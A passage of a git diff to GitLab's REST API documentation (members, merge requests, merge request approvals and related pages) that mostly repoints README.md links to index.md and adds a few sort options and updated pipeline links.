project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the managed license | | `approval_status` | string | yes | The approval status. "approved" or "blacklisted" | @@ -104,7 +104,7 @@ DELETE /projects/:id/managed_licenses/:managed_license_id | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `managed_license_id` | integer/string | yes | The ID or URL-encoded name of the license belonging to the project | ```shell @@ -123,7 +123,7 @@ PATCH /projects/:id/managed_licenses/:managed_license_id | Attribute | Type | Required | Description | | --------------- | ------- | --------------------------------- | ------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `managed_license_id` | integer/string | yes | The ID or URL-encoded name of the license belonging to the project | | `approval_status` | string | yes | The approval status. "approved" or "blacklisted" | diff --git a/doc/api/markdown.md b/doc/api/markdown.md index 157714c2791..d83b7420829 100644 --- a/doc/api/markdown.md +++ b/doc/api/markdown.md @@ -14,14 +14,14 @@ Available only in APIv4. ## Render an arbitrary Markdown document ```plaintext -POST /api/v4/markdown +POST /markdown ``` | Attribute | Type | Required | Description | | --------- | ------- | ------------- | ------------------------------------------ | | `text` | string | yes | The Markdown text to render | | `gfm` | boolean | no | Render text using GitLab Flavored Markdown. Default is `false` | -| `project` | string | no | Use `project` as a context when creating references using GitLab Flavored Markdown. [Authentication](README.md#authentication) is required if a project is not public. | +| `project` | string | no | Use `project` as a context when creating references using GitLab Flavored Markdown. [Authentication](index.md#authentication) is required if a project is not public. | ```shell curl --header Content-Type:application/json --data '{"text":"Hello world! :tada:", "gfm":true, "project":"group_example/project_example"}' "https://gitlab.example.com/api/v4/markdown" diff --git a/doc/api/members.md b/doc/api/members.md index 627c9a12b5e..560fc8262c0 100644 --- a/doc/api/members.md +++ b/doc/api/members.md @@ -43,7 +43,7 @@ GET /projects/:id/members | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `query` | string | no | A query string to search for members | | `user_ids` | array of integers | no | Filter the results on the given user IDs | @@ -104,7 +104,7 @@ GET /projects/:id/members/all | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `query` | string | no | A query string to search for members | | `user_ids` | array of integers | no | Filter the results on the given user IDs | @@ -169,7 +169,7 @@ GET /projects/:id/members/:user_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the member | ```shell @@ -208,7 +208,7 @@ GET /projects/:id/members/all/:user_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the member | ```shell @@ -244,7 +244,7 @@ This API endpoint works on top-level groups only. It does not work on subgroups. NOTE: Unlike other API endpoints, billable members is updated once per day at 12:00 UTC. -This function takes [pagination](README.md#pagination) parameters `page` and `per_page` to restrict the list of users. +This function takes [pagination](index.md#pagination) parameters `page` and `per_page` to restrict the list of users. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/262875) in GitLab 13.7, the `search` and `sort` parameters allow you to search for billable group members by name and sort the results, @@ -256,22 +256,24 @@ GET /groups/:id/billable_members | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `search` | string | no | A query string to search for group members by name, username, or email. | | `sort` | string | no | A query string containing parameters that specify the sort attribute and order. See supported values below.| The supported values for the `sort` attribute are: -| Value | Description | -| ------------------- | ------------------------ | -| `access_level_asc` | Access level, ascending | -| `access_level_desc` | Access level, descending | -| `last_joined` | Last joined | -| `name_asc` | Name, ascending | -| `name_desc` | Name, descending | -| `oldest_joined` | Oldest joined | -| `oldest_sign_in` | Oldest sign in | -| `recent_sign_in` | Recent sign in | +| Value | Description | +| ----------------------- | ---------------------------- | +| `access_level_asc` | Access level, ascending | +| `access_level_desc` | Access level, descending | +| `last_joined` | Last joined | +| `name_asc` | Name, ascending | +| `name_desc` | Name, descending | +| `oldest_joined` | Oldest joined | +| `oldest_sign_in` | Oldest sign in | +| `recent_sign_in` | Recent sign in | +| `last_activity_on_asc` | Last active date, ascending | +| `last_activity_on_desc` | Last active date, descending | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/:id/billable_members" @@ -333,7 +335,7 @@ This API endpoint works on top-level groups only. It does not work on subgroups. This API endpoint requires permission to admin memberships for the group. -This API endpoint takes [pagination](README.md#pagination) parameters `page` and `per_page` to restrict the list of memberships. +This API endpoint takes [pagination](index.md#pagination) parameters `page` and `per_page` to restrict the list of memberships. ```plaintext GET /groups/:id/billable_members/:user_id/memberships @@ -341,7 +343,7 @@ GET /groups/:id/billable_members/:user_id/memberships | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the billable member | ```shell @@ -393,7 +395,7 @@ DELETE /groups/:id/billable_members/:user_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the member | ```shell @@ -411,7 +413,7 @@ POST /projects/:id/members | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer/string | yes | The user ID of the new member or multiple IDs separated by commas | | `access_level` | integer | yes | A valid access level | | `expires_at` | string | no | A date string in the format `YEAR-MONTH-DAY` | @@ -452,7 +454,7 @@ PUT /projects/:id/members/:user_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the member | | `access_level` | integer | yes | A valid access level | | `expires_at` | string | no | A date string in the format `YEAR-MONTH-DAY` | @@ -492,7 +494,7 @@ POST /groups/:id/members/:user_id/override | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the member | ```shell @@ -529,7 +531,7 @@ DELETE /groups/:id/members/:user_id/override | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the member | ```shell @@ -564,7 +566,7 @@ DELETE /projects/:id/members/:user_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `user_id` | integer | yes | The user ID of the member | | `skip_subresources` | boolean | false | Whether the deletion of direct memberships of the removed member in subgroups and projects should be skipped. Default is `false`. | | `unassign_issuables` | boolean | false | Whether the removed member should be unassigned from any issues or merge requests inside a given group or project. Default is `false`. | diff --git a/doc/api/merge_request_approvals.md b/doc/api/merge_request_approvals.md index 8947e5b382f..7bcf4d4c875 100644 --- a/doc/api/merge_request_approvals.md +++ b/doc/api/merge_request_approvals.md @@ -29,7 +29,7 @@ GET /projects/:id/approvals | Attribute | Type | Required | Description | | --------- | ------- | -------- | ------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | ```json { @@ -58,7 +58,7 @@ POST /projects/:id/approvals | Attribute | Type | Required | Description | | ------------------------------------------------ | ------- | -------- | --------------------------------------------------------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `approvals_before_merge` | integer | no | How many approvals are required before an MR can be merged. Deprecated in 12.0 in favor of Approval Rules API. | | `reset_approvals_on_push` | boolean | no | Reset approvals on a new push | | `disable_overriding_approvers_per_merge_request` | boolean | no | Allow/Disallow overriding approvers per MR | @@ -93,7 +93,7 @@ GET /projects/:id/approval_rules | Attribute | Type | Required | Description | |----------------------|---------|----------|-----------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | ```json [ @@ -192,7 +192,7 @@ GET /projects/:id/approval_rules/:approval_rule_id | Attribute | Type | Required | Description | |----------------------|---------|----------|-----------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `approval_rule_id` | integer | yes | The ID of a approval rule | ```json @@ -291,7 +291,7 @@ POST /projects/:id/approval_rules | Attribute | Type | Required | Description | |------------------------|---------|----------|------------------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `name` | string | yes | The name of the approval rule | | `approvals_required` | integer | yes | The number of required approvals for this rule | | `user_ids` | Array | no | The ids of users as approvers | @@ -396,7 +396,7 @@ PUT /projects/:id/approval_rules/:approval_rule_id | Attribute | Type | Required | Description | |------------------------|---------|----------|------------------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `approval_rule_id` | integer | yes | The ID of a approval rule | | `name` | string | yes | The name of the approval rule | | `approvals_required` | integer | yes | The number of required approvals for this rule | @@ -500,7 +500,7 @@ DELETE /projects/:id/approval_rules/:approval_rule_id | Attribute | Type | Required | Description | |----------------------|---------|----------|-----------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `approval_rule_id` | integer | yes | The ID of a approval rule ## Merge Request-level MR approvals @@ -523,7 +523,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/approvals | Attribute | Type | Required | Description | |---------------------|---------|----------|---------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of MR | ```json @@ -570,7 +570,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/approvals | Attribute | Type | Required | Description | |----------------------|---------|----------|--------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of MR | | `approvals_required` | integer | yes | Approvals required before MR can be merged. Deprecated in 12.0 in favor of Approval Rules API. | @@ -612,7 +612,7 @@ This includes additional information about the users who have already approved | Attribute | Type | Required | Description | |----------------------|---------|----------|---------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of MR | ```json @@ -679,7 +679,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/approval_rules | Attribute | Type | Required | Description | |---------------------|---------|----------|---------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of MR | ```json @@ -757,7 +757,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/approval_rules | Attribute | Type | Required | Description | |----------------------------|---------|----------|------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of MR | | `name` | string | yes | The name of the approval rule | | `approvals_required` | integer | yes | The number of required approvals for this rule | @@ -847,7 +847,7 @@ These are system generated rules. | Attribute | Type | Required | Description | |----------------------|---------|----------|------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The ID of MR | | `approval_rule_id` | integer | yes | The ID of a approval rule | | `name` | string | yes | The name of the approval rule | @@ -931,7 +931,7 @@ These are system generated rules. | Attribute | Type | Required | Description | |---------------------|---------|----------|---------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of the merge request | | `approval_rule_id` | integer | yes | The ID of an approval rule | @@ -951,7 +951,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/approve | Attribute | Type | Required | Description | |---------------------|---------|----------|-------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of the merge request | | `sha` | string | no | The `HEAD` of the merge request | | `approval_password` **(PREMIUM)** | string | no | Current user's password. Required if [**Require user password to approve**](../user/project/merge_requests/approvals/settings.md#require-authentication-for-approvals) is enabled in the project settings. | @@ -1015,5 +1015,5 @@ POST /projects/:id/merge_requests/:merge_request_iid/unapprove | Attribute | Type | Required | Description | |---------------------|---------|----------|---------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | diff --git a/doc/api/merge_request_context_commits.md b/doc/api/merge_request_context_commits.md index cd38d972320..b40d67ab4e3 100644 --- a/doc/api/merge_request_context_commits.md +++ b/doc/api/merge_request_context_commits.md @@ -17,7 +17,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/context_commits Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `merge_request_iid` (required) - The internal ID of the merge request ```json @@ -49,7 +49,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/context_commits Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `merge_request_iid` (required) - The internal ID of the merge request ```plaintext @@ -88,7 +88,7 @@ DELETE /projects/:id/merge_requests/:merge_request_iid/context_commits Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `merge_request_iid` (required) - The internal ID of the merge request | Attribute | Type | Required | Description | diff --git a/doc/api/merge_requests.md b/doc/api/merge_requests.md index 57754f62d5a..bc8c0397a3a 100644 --- a/doc/api/merge_requests.md +++ b/doc/api/merge_requests.md @@ -265,7 +265,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------------------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `iids[]` | integer array | no | Return the request having the given `iid`. | | `state` | string | no | Return all merge requests or just those that are `opened`, `closed`, `locked`, or `merged`. | | `order_by` | string | no | Return requests ordered by `created_at` or `updated_at` fields. Default is `created_at`. | @@ -453,7 +453,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------------------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user. | | `state` | string | no | Return all merge requests or just those that are `opened`, `closed`, `locked`, or `merged`. | | `order_by` | string | no | Return merge requests ordered by `created_at` or `updated_at` fields. Default is `created_at`. | | `sort` | string | no | Return merge requests sorted in `asc` or `desc` order. Default is `desc`. | @@ -623,7 +623,7 @@ Parameters: | Attribute | Type | Required | Description | |----------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | | `render_html` | integer | no | If `true` response includes rendered HTML for title and description. | | `include_diverged_commits_count` | boolean | no | If `true` response includes the commits behind the target branch. | @@ -790,7 +790,7 @@ Parameters: | Attribute | Type | Required | Description | |----------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```json @@ -826,7 +826,7 @@ Parameters: | Attribute | Type | Required | Description | |----------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```json @@ -864,7 +864,7 @@ Parameters: | Attribute | Type | Required | Description | |----------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | | `access_raw_diffs` | boolean | no | Retrieve change diffs via Gitaly. | @@ -988,7 +988,7 @@ Parameters: | Attribute | Type | Required | Description | |----------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```json @@ -1006,15 +1006,15 @@ Parameters: > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/31722) in GitLab 12.3. -Create a new [pipeline for a merge request](../ci/merge_request_pipelines/index.md). +Create a new [pipeline for a merge request](../ci/pipelines/merge_request_pipelines.md). A pipeline created via this endpoint doesn't run a regular branch/tag pipeline. It requires `.gitlab-ci.yml` to be configured with `only: [merge_requests]` to create jobs. The new pipeline can be: - A detached merge request pipeline. -- A [pipeline for merged results](../ci/merge_request_pipelines/pipelines_for_merged_results/index.md) - if the [project setting is enabled](../ci/merge_request_pipelines/pipelines_for_merged_results/index.md#enable-pipelines-for-merged-results). +- A [pipeline for merged results](../ci/pipelines/pipelines_for_merged_results.md) + if the [project setting is enabled](../ci/pipelines/pipelines_for_merged_results.md#enable-pipelines-for-merged-results). ```plaintext POST /projects/:id/merge_requests/:merge_request_iid/pipelines @@ -1024,7 +1024,7 @@ Parameters: | Attribute | Type | Required | Description | |----------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```json @@ -1076,7 +1076,7 @@ POST /projects/:id/merge_requests | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `source_branch` | string | yes | The source branch. | | `target_branch` | string | yes | The target branch. | | `title` | string | yes | Title of MR. | @@ -1226,7 +1226,7 @@ PUT /projects/:id/merge_requests/:merge_request_iid | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The ID of a merge request. | | `target_branch` | string | no | The target branch. | | `title` | string | no | Title of MR. | @@ -1397,7 +1397,7 @@ DELETE /projects/:id/merge_requests/:merge_request_iid | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```shell @@ -1424,7 +1424,7 @@ Parameters: | Attribute | Type | Required | Description | |--------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | | `merge_commit_message` | string | no | Custom merge commit message. | | `squash_commit_message` | string | no | Custom squash commit message. | @@ -1596,7 +1596,7 @@ Parameters: | Attribute | Type | Required | Description | |--------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```json @@ -1619,7 +1619,7 @@ Parameters: | Attribute | Type | Required | Description | |--------------------------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```json @@ -1776,7 +1776,7 @@ PUT /projects/:id/merge_requests/:merge_request_iid/rebase | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | | `skip_ci` | boolean | no | Set to `true` to skip creating a CI pipeline. | @@ -1839,7 +1839,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/closes_issues | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```shell @@ -1915,7 +1915,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/subscribe | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```shell @@ -2075,7 +2075,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/unsubscribe | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```shell @@ -2235,7 +2235,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/todo | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```shell @@ -2478,7 +2478,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/time_estimate | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | | `duration` | string | yes | The duration in human format, such as `3h30m`. | @@ -2507,7 +2507,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/reset_time_estimate | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of a project's merge_request. | ```shell @@ -2535,7 +2535,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/add_spent_time | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | | `duration` | string | yes | The duration in human format, such as `3h30m` | @@ -2564,7 +2564,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/reset_spent_time | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of a 